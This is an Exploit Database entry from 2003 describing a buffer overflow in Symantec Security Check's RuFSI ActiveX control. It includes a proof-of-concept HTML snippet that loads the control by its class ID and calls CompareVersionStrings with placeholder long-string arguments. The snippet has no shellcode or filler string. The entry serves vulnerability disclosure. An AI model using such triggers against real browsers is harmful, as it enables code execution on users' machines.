Symantec Security Check RuFSI - ActiveX Control Buffer Overflow

EDB-ID:

22816




Platform:

Windows

Date:

2003-06-23


source: https://www.securityfocus.com/bid/8008/info

It has been reported that the RuFSI Utility Class is vulnerable to a boundary condition error when invoked with long strings. This could potentially lead to the execution of code with the privileges of the user executing the web browser. 

<object classid="clsid:69DEAF94-AF66-11D3-BEC0-00105AA9B6AE" id="test">
</object>

<script>
test.CompareVersionStrings("long string here","or long string here")
</script>